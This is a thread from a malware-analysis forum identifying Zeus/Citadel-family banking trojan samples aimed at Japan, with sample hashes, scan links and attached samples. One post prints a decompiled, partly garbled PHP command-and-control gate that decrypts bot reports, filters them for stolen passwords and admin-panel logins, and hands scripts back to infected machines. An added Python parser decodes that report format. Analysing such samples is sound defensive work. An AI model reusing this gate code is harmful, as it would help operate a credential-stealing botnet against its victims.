A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #21727  by Kafeine
 Wed Dec 18, 2013 8:14 am
The group behind the Citadel 1.3.5.1 that was striking Japan has moved to something else.
It looks like an older version of Zeus... which would be too weird to be true.
I have been told that it could be Zeus PowerLoader.

Can anyone who knows this stuff give an appropriate name to the attached sample?

64a39e6c10c58fca07d17620b9864fdf

Here it is, successfully handled by Cuckoo:
https://malwr.com/analysis/MTZmMDQ5MDhi ... 0315363cb3
Attachments
(42.61 KiB) Downloaded 69 times
 #21810  by Xylitol
 Sat Dec 28, 2013 10:24 am
Some zbot, see comment in VT for more info.

Zeus 2.1.0.1:

Zeus 2.0.8.9:

IceIX:
 #21851  by Xylitol
 Fri Jan 03, 2014 2:52 pm
Weird zeus, Control Panel 2.7.6.8, Builder 2.9.6.1
praim.exe: https://www.virustotal.com/en/file/382e ... 388760471/
bk.exe: https://www.virustotal.com/en/file/0ea5 ... 388760480/
C&C requires the ionCube loader, no more RC4 (when trying to decode: MCRYPT_RIJNDAEL_128, MCRYPT_MODE_ECB)
decode try:
Code:
if(!extension_loaded('ionCube Loader')){$__oc=strtolower(substr(php_uname(),0,3));$__ln='ioncube_loader_'.$__oc.'_'.substr(phpversion(),0,3).(($__oc=='win')?'.dll':'.so');if(function_exists('dl')){@dl($__ln);}if(function_exists('_il_exec')){return _il_exec();}$__ln='/ioncube/'.$__ln;$__oid=$__id=realpath(ini_get('extension_dir'));$__here=dirname(__FILE__);if(strlen($__id)>1&&$__id[1]==':'){$__id=str_replace('\\','/',substr($__id,2));$__here=str_replace('\\','/',substr($__here,2));}$__rd=str_repeat('/..',substr_count($__id,'/')).$__here.'/';$__i=strlen($__rd);while($__i--){if($__rd[$__i]=='/'){$__lp=substr($__rd,0,$__i).$__ln;if(file_exists($__oid.$__lp)){$__ln=$__lp;break;}}}if(function_exists('dl')){@dl($__ln);}}else{die('The file '.__FILE__." is corrupted.\n");}if(function_exists('_il_exec')){return _il_exec();}echo('Site error: the file <b>'.__FILE__.'</b> requires the ionCube PHP Loader '.basename($__ln).' to be installed by the website operator. If you are the website operator please use the <a href="http://www.ioncube.com/lw/">ionCube Loader Wizard</a> to assist with installation.');exit(199);
?>"

<?php

function toUint($str) {
    @unpack( 'L', $str );
    $q = ;
    return (( is_array( $q ) && is_numeric( $q[1] ) ) ? ($q[1] < 0 ? sprintf( '%u', $q[1] ) : $q[1]) : 0);
}

function toInt($str) {
    @unpack( 'l', $str );
    $q = ;
    return (( is_array( $q ) && is_numeric( $q[1] ) ) ? $q[1] : 0);
}

function toUshort($str) {
    @unpack( 'S', $str );
    $q = ;
    return (( is_array( $q ) && is_numeric( $q[1] ) ) ? $q[1] : 0);
}

function isHackNameForPath($name) {
    strlen( $name );
    $len = ;
    return (( ( ( ( 0 < $len && substr_count( $name, '.' ) < $len ) && strpos( $name, '/' ) === false ) && strpos( $name, '\' ) === false ) && strpos( $name, '' ) === false ) ? false : true);
    }

    define( '__REPORT__', 1 );

    if ($_SERVER['REQUEST_METHOD'] != 'POST') {
        exit(  );
    }

    require_once( 'system/config.php' );
    @file_get_contents( 'php://input' );
                    $data = ;
                    @strlen( $data );
                    $dataSize = ;

                    if ($dataSize < HEADER_SIZE + ITEM_HEADER_SIZE) {
                        exit(  );
                    }

                    $config['botnet_cryptkey'];
                    $key = ;
                    mcrypt_module_open( MCRYPT_RIJNDAEL_128, '', MCRYPT_MODE_ECB, '' );
                    $td = ;
                    mcrypt_create_iv( mcrypt_enc_get_iv_size( $td ), MCRYPT_RAND );
                    $iv = ;
                    mcrypt_generic_init( $td, $key, $iv );
                    mdecrypt_generic( $td, $data );
                    $data = ;
                    visualDecrypt( $data );

                    if (strcmp( md5( substr( $data, HEADER_SIZE ), true ), substr( $data, HEADER_MD5, 16 ) ) !== 0) {
                        mcrypt_generic_deinit( $td );
                        mcrypt_module_close( $td );
                        exit(  );
                    }

                    $list = array(  );
                    $i = HEADER_SIZE;

                    while ($i < $dataSize) {
                        unpack( 'L4', @substr( $data, $i, ITEM_HEADER_SIZE ) );
                        $k = ;
                        $list[$k[1]] = @substr( $data, $i + ITEM_HEADER_SIZE, $k[3] );
                        $i += ITEM_HEADER_SIZE + $k[3];
                    }

                    unset( $$data );

                    if (( empty( $list[SBCID_BOT_VERSION] ) || empty( $list[SBCID_BOT_ID] ) )) {
                        mcrypt_generic_deinit( $td );
                        mcrypt_module_close( $td );
                        exit(  );
                    }


                    if (!connectToDb(  )) {
                        mcrypt_generic_deinit( $td );
                        mcrypt_module_close( $td );
                        exit(  );
                    }

                    require_once( 'system/geoip.php' );
                    dirname( __FILE__ );
                    $dirname = ;
                    $realIpv4 = (!empty( $_GET['ip'] ) ? addslashes( trim( $_GET['ip'] ) ) : $_SERVER['REMOTE_ADDR']);
                    $cool_geoip_file = $dirname . '/system/geoip.dat';
                    geoip_open( $cool_geoip_file, GEOIP_STANDARD );
                    $cool_gi = ;
                    geoip_country_code_by_addr( $cool_gi, $realIpv4 );
                    $cool_cc = ;
                    geoip_close( $cool_gi );
                    str_replace( ' ', ' ', trim( $list[SBCID_BOT_ID] ) );
                    $botId = ;
                    addslashes( $botId );
                    $botIdQ = ;
                    $botnet = (empty( $list[SBCID_BOTNET] ) ? DEFAULT_BOTNET : str_replace( ' ', ' ', trim( $list[SBCID_BOTNET] ) ));
                    addslashes( $botnet );
                    $botnetQ = ;
                    toUint( $list[SBCID_BOT_VERSION] );
                    $botVersion = ;
                    $country = (!empty( $$cool_cc ) ? $cool_cc : '--');
                    addslashes( $country );
                    $countryQ = ;
                    time(  );
                    $curTime = ;

                    if (( ( !empty( $list[SBCID_SCRIPT_ID] ) && ( isset( $list[SBCID_SCRIPT_STATUS] ) && isset( $list[SBCID_SCRIPT_RESULT] ) ) ) && strlen( $list[SBCID_SCRIPT_ID] ) == 16 )) {
                        if (!mysqlQueryEx( 'botnet_scripts_stat',  . 'INSERT INTO `botnet_scripts_stat` SET `bot_id`=\'' . $botIdQ . '\', `bot_version`=' . $botVersion . ', `rtime`=' . $curTime . ', ' . '`extern_id`=\'' . addslashes( $list[SBCID_SCRIPT_ID] ) . '\',' . '`type`=' . (toInt( $list[SBCID_SCRIPT_STATUS] ) == 0 ? 2 : 3) . ',' . '`report`=\'' . addslashes( $list[SBCID_SCRIPT_RESULT] ) . '\'' )) {
                            mcrypt_generic_deinit( $td );
                            mcrypt_module_close( $td );
                            exit(  );
                        }
                    }
                    else {
                        if (( !empty( $list[SBCID_BOTLOG] ) && !empty( $list[SBCID_BOTLOG_TYPE] ) )) {
                            toInt( $list[SBCID_BOTLOG_TYPE] );
                            $type = ;

                            if ($type == BLT_FILE) {
                                $bad_exts = array( '.php3', '.php4', '.php5', '.php', '.asp', '.aspx', '.exe', '.pl', '.cgi', '.cmd', '.bat', '.phtml', '.htaccess' );
                                $fd_hash = 7;
                                strlen( $list[SBCID_BOTLOG] );
                                $fd_size = ;

                                if (( isHackNameForPath( $botId ) || isHackNameForPath( $botnet ) )) {
                                    mcrypt_generic_deinit( $td );
                                    mcrypt_module_close( $td );
                                    exit(  );
                                }

                                $file_root = $config['reports_path'] . '/files/' . urlencode( $botnet ) . '/' . urlencode( $botId );
                                $file_path = $cool_path;
                                $last_name = '';
                                explode( '/', (( isset( $list[SBCID_PATH_DEST] ) && 0 < strlen( $list[SBCID_PATH_DEST] ) ) ? str_replace( '\', '/', $list[SBCID_PATH_DEST] ) : 'unknown') );
                $l = ;
                foreach ($l as ) {
                    $k = &;

                    if (isHackNameForPath( $k )) {
                        mcrypt_generic_deinit( $td );
                        mcrypt_module_close( $td );
                        exit(  );
                    }

                    urlencode( $k );
                    $file_path .= '/' . $last_name = ;
                }


                if (strlen( $last_name ) === 0) {
                    $file_path .= '/unknown.dat';
                }

                unset( $$l );
                strrchr( $last_name, '.' );

                if (( $ext =  === false || in_array( strtolower( $ext ), $bad_exts ) !== false )) {
                    $file_path .= '.dat';
                }

                strrpos( $file_path, '.' );
                $ext_pos = ;

                if (180 < strlen( $file_path )) {
                    $file_path = $file_root . '/longname.dat';
                }

                $i = 7;

                while ($i < 9999) {
                    if ($i == 0) {
                        $f = $content;
                    }
else {
                        substr_replace( $file_path, '(' . $i . ').', $ext_pos, 1 );
                        $f = ;
                    }


                    if (file_exists( $f )) {
                        if ($fd_size == filesize( $f )) {
                            if ($fd_hash === 0) {
                                md5( $list[SBCID_BOTLOG], true );
                                $fd_hash = ;
                            }


                            if (strcmp( md5_file( $f, true ), $fd_hash ) === 0) {
                                break;
                            }
                        }
                    }

                    fopen( $f, 'wb' );

                    if (( !createDir( dirname( $file_path ) ) || !$h =  )) {
                        mcrypt_generic_deinit( $td );
                        mcrypt_module_close( $td );
                        exit(  );
                    }

                    flock( $h, LOCK_EX );
                    fwrite( $h, $list[SBCID_BOTLOG] );
                    flock( $h, LOCK_UN );
                    fclose( $h );
                    break;
                    ++$i;
                }
            }
else {
                if ($config['reports_to_db'] === 1) {
                    $cool_write = 'YES';
                    $cool_path = (empty( $list[SBCID_PATH_SOURCE] ) ? '' : $list[SBCID_PATH_SOURCE]);
                    $content = (empty( $list[SBCID_BOTLOG] ) ? '' : $list[SBCID_BOTLOG]);

                    if (!empty( $$cool_path )) {
                        if (( ( ( ( ( stripos( $cool_path, 'http://' ) !== false || stripos( $cool_path, 'facebook.com' ) !== false ) || stripos( $cool_path, 'bar-navig.yandex.ru' ) !== false ) || stripos( $cool_path, '/channel/bind' ) !== false ) || stripos( $cool_path, 'mail.google.com/mail/u/' ) !== false ) || stripos( $cool_path, 'plus.google.com/u/' ) !== false )) {
                                            $cool_write = 'NO';
                                        }


                                        if (( ( ( stripos( $cool_path, ':2222/CMD_LOGIN' ) !== false || ( stripos( $cool_path, ':208' ) !== false && stripos( $cool_path, '/login' ) !== false ) ) || ( stripos( $cool_path, '/ispmgr' ) !== false && stripos( $content, 'password=' ) !== false ) ) || ( stripos( $cool_path, '/vdsmgr' ) !== false && stripos( $content, 'password=' ) !== false ) )) {
                                            $cool_write = 'YES';
                                        }


                                        if (( ( ( ( ( ( stripos( $cool_path, 'admin' ) !== false && stripos( $cool_path, 'wp-admin' ) === false ) || stripos( $cool_path, 'panel' ) !== false ) || stripos( $cool_path, 'staff' ) !== false ) || stripos( $cool_path, 'editor' ) !== false ) || stripos( $cool_path, 'manager' ) !== false ) && ( ( ( ( ( stripos( $content, 'AUTH_PW=' ) !== false || stripos( $content, 'pass=' ) !== false ) || stripos( $content, 'passwd=' ) !== false ) || stripos( $content, 'password=' ) !== false ) || stripos( $content, 'pwd=' ) !== false ) || stripos( $content, 'HTTP authentication: username=' ) !== false ) )) {
                                            $cool_write = 'YES';
                                        }


                                        if (( ( stripos( $cool_path, 'http://192.168.' ) !== false || stripos( $cool_path, 'localhost' ) !== false ) || stripos( $cool_path, '.local' ) !== false )) {
                                            $cool_write = 'NO';
                                        }
                                    }


                                    if ($cool_write == 'YES') {
                                        $table = 'botnet_reports_' . gmdate( 'ymd', $curTime );
                                        $query = (  . 'INSERT INTO `' . $table . '` SET `bot_id`=\'' . $botIdQ . '\', `botnet`=\'' . $botnetQ . '\', `bot_version`=' . $botVersion . ', `type`=' . $type . ', `country`=\'' . $countryQ . '\', `rtime`=' . $curTime . ',' ) . 'path_source=\'' . (empty( $list[SBCID_PATH_SOURCE] ) ? '' : addslashes( $list[SBCID_PATH_SOURCE] )) . '\',' . 'path_dest=\'' . (empty( $list[SBCID_PATH_DEST] ) ? '' : addslashes( $list[SBCID_PATH_DEST] )) . '\',' . 'time_system=' . (empty( $list[SBCID_TIME_SYSTEM] ) ? 0 : toUint( $list[SBCID_TIME_SYSTEM] )) . ',' . 'time_tick=' . (empty( $list[SBCID_TIME_TICK] ) ? 0 : toUint( $list[SBCID_TIME_TICK] )) . ',' . 'time_localbias=' . (empty( $list[SBCID_TIME_LOCALBIAS] ) ? 0 : toInt( $list[SBCID_TIME_LOCALBIAS] )) . ',' . 'os_version=\'' . (empty( $list[SBCID_OS_INFO] ) ? '' : addslashes( $list[SBCID_OS_INFO] )) . '\',' . 'language_id=' . (empty( $list[SBCID_LANGUAGE_ID] ) ? 0 : toUshort( $list[SBCID_LANGUAGE_ID] )) . ',' . 'process_name=\'' . (empty( $list[SBCID_PROCESS_NAME] ) ? '' : addslashes( $list[SBCID_PROCESS_NAME] )) . '\',' . 'process_user=\'' . (empty( $list[SBCID_PROCESS_USER] ) ? '' : addslashes( $list[SBCID_PROCESS_USER] )) . '\',' . 'ipv4=\'' . addslashes( $realIpv4 ) . '\',' . 'context=\'' . addslashes( $list[SBCID_BOTLOG] ) . '\'';

                                        if (( !mysqlQueryEx( $table, $query ) && ( !@mysql_query(  . 'CREATE TABLE IF NOT EXISTS `' . $table . '` LIKE `botnet_reports`' ) || !mysqlQueryEx( $table, $query ) ) )) {
                                            mcrypt_generic_deinit( $td );
                                            mcrypt_module_close( $td );
                                            exit(  );
                                        }
                                    }
                                }


                                if ($config['reports_to_fs'] === 1) {
                                    if (( isHackNameForPath( $botId ) || isHackNameForPath( $botnet ) )) {
                                        mcrypt_generic_deinit( $td );
                                        mcrypt_module_close( $td );
                                        exit(  );
                                    }

                                    $file_path = $config['reports_path'] . '/other/' . urlencode( $botnet ) . '/' . urlencode( $botId );
                                    fopen( $file_path . '/reports.txt', 'ab' );

                                    if (( !createDir( $file_path ) || !$h =  )) {
                                        mcrypt_generic_deinit( $td );
                                        mcrypt_module_close( $td );
                                        exit(  );
                                    }

                                    flock( $h, LOCK_EX );
                                    fwrite( $h, str_repeat( '=', 80 ) . '
' . (  . 'bot_id=' . $botId . '
' ) . (  . 'botnet=' . $botnet . '
' ) . 'bot_version=' . intToVersion( $botVersion ) . '
' . (  . 'ipv4=' . $realIpv4 . '
' ) . (  . 'country=' . $country . '
' ) . (  . 'type=' . $type . '
' ) . 'rtime=' . gmdate( 'H:i:s d.m.Y', $curTime ) . '
' . 'time_system=' . (empty( $list[SBCID_TIME_SYSTEM] ) ? 0 : gmdate( 'H:i:s d.m.Y', toInt( $list[SBCID_TIME_SYSTEM] ) )) . '
' . 'time_tick=' . (empty( $list[SBCID_TIME_TICK] ) ? 0 : tickCountToText( toUint( $list[SBCID_TIME_TICK] ) / 1000 )) . '
' . 'time_localbias=' . (empty( $list[SBCID_TIME_LOCALBIAS] ) ? 0 : timeBiasToText( toInt( $list[SBCID_TIME_LOCALBIAS] ) )) . '
' . 'os_version=' . (empty( $list[SBCID_OS_INFO] ) ? '' : osDataToString( $list[SBCID_OS_INFO] )) . '
' . 'language_id=' . (empty( $list[SBCID_LANGUAGE_ID] ) ? 0 : toUshort( $list[SBCID_LANGUAGE_ID] )) . '
' . 'process_name=' . (empty( $list[SBCID_PROCESS_NAME] ) ? '' : $list[SBCID_PROCESS_NAME]) . '
' . 'process_user=' . (empty( $list[SBCID_PROCESS_USER] ) ? '' : $list[SBCID_PROCESS_USER]) . '
' . 'path_source=' . (empty( $list[SBCID_PATH_SOURCE] ) ? '' : $list[SBCID_PATH_SOURCE]) . '
' . 'context=
' . $list[SBCID_BOTLOG] . '


' );
                                    flock( $h, LOCK_UN );
                                    fclose( $h );
                                }
                            }
                        }
                        else {
                            if (!empty( $list[SBCID_NET_LATENCY] )) {
                                $query =  . '`bot_id`=\'' . $botIdQ . '\', `botnet`=\'' . $botnetQ . '\', `bot_version`=' . $botVersion . ', `country`=\'' . $countryQ . '\', `rtime_last`=' . $curTime . ', ' . '`net_latency`=' . (empty( $list[SBCID_NET_LATENCY] ) ? 0 : toUint( $list[SBCID_NET_LATENCY] )) . ', ' . '`tcpport_s1`=' . (empty( $list[SBCID_TCPPORT_S1] ) ? 0 : toUshort( $list[SBCID_TCPPORT_S1] )) . ', ' . '`time_localbias`=' . (empty( $list[SBCID_TIME_LOCALBIAS] ) ? 0 : toInt( $list[SBCID_TIME_LOCALBIAS] )) . ', ' . '`os_version`=\'' . (empty( $list[SBCID_OS_INFO] ) ? '' : addslashes( $list[SBCID_OS_INFO] )) . '\', ' . '`language_id`=' . (empty( $list[SBCID_LANGUAGE_ID] ) ? 0 : toUshort( $list[SBCID_LANGUAGE_ID] )) . ', ' . '`ipv4_list`=\'' . (empty( $list[SBCID_IPV4_ADDRESSES] ) ? '' : addslashes( $list[SBCID_IPV4_ADDRESSES] )) . '\', ' . '`ipv6_list`=\'' . (empty( $list[SBCID_IPV6_ADDRESSES] ) ? '' : addslashes( $list[SBCID_IPV6_ADDRESSES] )) . '\', ' . '`ipv4`=\'' . addslashes( pack( 'N', ip2long( $realIpv4 ) ) ) . '\'';

                                if (!mysqlQueryEx( 'botnet_list', (  . 'INSERT INTO `botnet_list` SET `comment`=\'\', `rtime_first`=' . $curTime . ', `rtime_online`=' . $curTime . ', ' . $query . ' ' ) . 'ON DUPLICATE KEY UPDATE `rtime_online`=IF(`rtime_last` <= ' . ( $curTime - $config['botnet_timeout'] ) . (  . ', ' . $curTime . ', `rtime_online`), ' . $query ) )) {
                                    mcrypt_generic_deinit( $td );
                                    mcrypt_module_close( $td );
                                    exit(  );
                                }

                                unset( $$query );
                                $replyData = '';
                                $replyCount = 7;
                                toSqlSafeMask( $botIdQ );
                                $botIdQm = ;
                                toSqlSafeMask( $botnetQ );
                                $botnetQm = ;
                                toSqlSafeMask( $countryQ );
                                $countryQm = ;
                                mysqlQueryEx( 'botnet_scripts', 'SELECT `extern_id`, `script_bin`, `send_limit`, `id` FROM `botnet_scripts` WHERE `flag_enabled`=1 AND ' . (  . '(`countries_wl`=\'\' OR `countries_wl` LIKE BINARY \'% ' . $countryQm . ' %\') AND ' ) . (  . '(`countries_bl` NOT LIKE BINARY \'% ' . $countryQm . ' %\') AND ' ) . (  . '(`botnets_wl`=\'\' OR `botnets_wl` LIKE BINARY \'% ' . $botnetQm . ' %\') AND ' ) . (  . '(`botnets_bl` NOT LIKE BINARY \'% ' . $botnetQm . ' %\') AND ' ) . (  . '(`bots_wl`=\'\' OR `bots_wl` LIKE BINARY \'% ' . $botIdQm . ' %\') AND ' ) . (  . '(`bots_bl` NOT LIKE BINARY \'% ' . $botIdQm . ' %\') ' ) . 'LIMIT 10' );
                                $r = ;

                                if ($r) {
                                    mysql_fetch_row( $r );

                                    if ($m = ) {
                                        addslashes( $m[0] );
                                        $eid = ;
                                        mysqlQueryEx( 'botnet_scripts_stat', (  . 'SELECT COUNT(*) FROM `botnet_scripts_stat` WHERE `type`=1 AND `extern_id`=\'' . $eid . '\'' ) );
                                        mysql_fetch_row( $j );

                                        if (( ( ( $m[2] != 0 && $j =  ) && $c =  ) && $m[2] <= $c[0] )) {
                                            mysqlQueryEx( 'botnet_scripts',  . 'UPDATE `botnet_scripts` SET `flag_enabled`=0 WHERE `id`=' . $m[3] . ' LIMIT 1' );
                                            continue;
                                        }


                                        if (mysqlQueryEx( 'botnet_scripts_stat',  . 'INSERT HIGH_PRIORITY INTO `botnet_scripts_stat` SET `extern_id`=\'' . $eid . '\', `type`=1, `bot_id`=\'' . $botIdQ . '\', `bot_version`=' . $botVersion . ', `rtime`=' . $curTime . ', `report`=\'Sended\'' )) {
                                            $size = strlen( $m[1] ) + strlen( $m[0] );
                                            $replyData .= pack( 'LLLL', ++$replyCount, 0, $size, $size ) . $m[0] . $m[1];
                                        }
                                    }
                                }


                                if (0 < $replyCount) {
                                    $replyData = pack( 'LLLLLLLL', mt_rand(  ), mt_rand(  ), mt_rand(  ), mt_rand(  ), mt_rand(  ), HEADER_SIZE + strlen( $replyData ), 0, $replyCount ) . md5( $replyData, true ) . $replyData;
                                    visualEncrypt( $replyData );
                                    mcrypt_generic_deinit( $td );
                                    mcrypt_generic_init( $td, $key, $iv );
                                    mcrypt_generic( $td, $replyData );
                                    $replyData = ;
                                    mcrypt_generic_deinit( $td );
                                    mcrypt_module_close( $td );
                                    echo $replyData;
                                    exit(  );
                                }
                            }
                            else {
                                mcrypt_generic_deinit( $td );
                                mcrypt_module_close( $td );
                                exit(  );
                            }
                        }
                    }

                    $replyData = pack( 'LLLLLLLL', mt_rand(  ), mt_rand(  ), mt_rand(  ), mt_rand(  ), mt_rand(  ), HEADER_SIZE + ITEM_HEADER_SIZE, 0, 1 ) . 'Jç 6äKù¿yÒu.#H ¥';
                    visualEncrypt( $replyData );
                    mcrypt_generic_deinit( $td );
                    mcrypt_generic_init( $td, $key, $iv );
                    mcrypt_generic( $td, $replyData );
                    $replyData = require_once( 'system/global.php' );
                    mcrypt_generic_deinit( $td );
                    mcrypt_module_close( $td );
                    echo $replyData;
                    exit(  );
?>
Edit: webinjects don't work on Opera 18.0 and Chrome 31.0.1650.63 m; latest Firefox (26.0): OK.
Attachments
infected
(2.41 MiB) Downloaded 92 times
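As an added example (not code from the thread, and not the gate's own code), here is a Python parser for the decrypted report container whose layout the dump above implies: a 48-byte header of eight 32-bit little-endian words with the raw MD5 of the body at offset 32, followed by 16-byte item headers packed as id/flags/size/size. The offsets and the SBCID_* numeric values are assumptions read off the reply-packing code, not stated on the page, and the AES-ECB and visualDecrypt stages are left out, so the input is the already-decrypted blob.

```python
"""Parser for the decrypted Zeus 2.x gate report container (constructed
example for analysis of captured traffic; not the thread's or Zeus's code).

Layout assumed from the PHP dump: pack('L8') header whose sixth word is the
total size and eighth the item count, then the raw MD5 of everything after
the header, then items of pack('LLLL', id, flags, size, size) + payload.
"""
import hashlib
import os
import struct

HEADER_SIZE = 48        # eight 4-byte words + 16-byte MD5 (inferred, not on the page)
HEADER_MD5 = 32         # MD5 sits right after the eight words (inferred)
ITEM_HEADER_SIZE = 16   # pack('LLLL', id, flags, size, size)

# Item ids: the names are the gate's; the numeric values are assumed placeholders
SBCID_BOT_ID = 10001
SBCID_BOTNET = 10002
SBCID_BOT_VERSION = 10003


def to_uint(raw):
    """Mirror of the gate's toUint(): first 4 bytes as little-endian unsigned, else 0."""
    if len(raw) < 4:
        return 0
    return struct.unpack_from("<I", raw)[0]


def build_container(items):
    """Pack items the way the gate packs its replies (five random words, total
    size, 0, item count, raw MD5 of the body).  Used here only to construct
    test input for the parser."""
    body = b""
    for item_id, payload in items.items():
        body += struct.pack("<IIII", item_id, 0, len(payload), len(payload)) + payload
    rand = struct.unpack("<5I", os.urandom(20))
    header = struct.pack("<8I", *rand, HEADER_SIZE + len(body), 0, len(items))
    return header + hashlib.md5(body).digest() + body


def parse_container(data):
    """Validate and split a decrypted container.  Mirrors the gate's size and
    MD5 checks, but fails loudly where the PHP's @substr silently truncates."""
    if len(data) < HEADER_SIZE + ITEM_HEADER_SIZE:
        raise ValueError("container shorter than header plus one item header")
    body = data[HEADER_SIZE:]
    if hashlib.md5(body).digest() != data[HEADER_MD5:HEADER_MD5 + 16]:
        raise ValueError("body MD5 does not match the header")
    items = {}
    off = HEADER_SIZE
    while off < len(data):
        if off + ITEM_HEADER_SIZE > len(data):
            raise ValueError("truncated item header at offset %d" % off)
        item_id, _flags, size, _size2 = struct.unpack_from("<IIII", data, off)
        start = off + ITEM_HEADER_SIZE
        if start + size > len(data):
            raise ValueError("item %d claims %d bytes past the end" % (item_id, size))
        items[item_id] = data[start:start + size]   # a later duplicate id wins, as in the gate
        off = start + size
    return items


def summarize(data):
    """Return the fields the gate refuses to proceed without, plus the item count."""
    items = parse_container(data)
    if not items.get(SBCID_BOT_ID) or not items.get(SBCID_BOT_VERSION):
        raise ValueError("report lacks bot id or bot version")
    return {
        "bot_id": items[SBCID_BOT_ID].decode("latin-1"),
        "botnet": items.get(SBCID_BOTNET, b"").decode("latin-1"),
        "bot_version": to_uint(items[SBCID_BOT_VERSION]),
        "item_count": len(items),
    }


if __name__ == "__main__":
    # Constructed sample report: bot id, botnet name, version 2.1.0.1 as a LE dword
    sample = build_container({
        SBCID_BOT_ID: b"WORKSTATION_1A2B",
        SBCID_BOTNET: b"sample",
        SBCID_BOT_VERSION: bytes([1, 0, 1, 2]),
    })
    print(summarize(sample))
```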
 #21860  by Xylitol
 Sat Jan 04, 2014 2:01 pm
Zbot pack from previous link (http://www.kernelmode.info/forum/viewto ... 210#p21810)
And some new:
Zeus 2.1.0.1:

Zeus 2.0.8.9:

IceIX:
Attachments
infected
(3.22 MiB) Downloaded 90 times
infected
(3.18 MiB) Downloaded 87 times
infected
(5 MiB) Downloaded 83 times
infected
(3.4 MiB) Downloaded 85 times
 #21889  by Xylitol
 Tue Jan 07, 2014 3:08 pm
Zeus Infection Spoofing Bitdefender AV ~ http://www.webroot.com/blog/2014/01/06/ ... fender-av/
https://www.virustotal.com/en/file/0469 ... 389107122/
I'm not familiar with this one; the bin is weird.
Attachments
infected
(211.01 KiB) Downloaded 64 times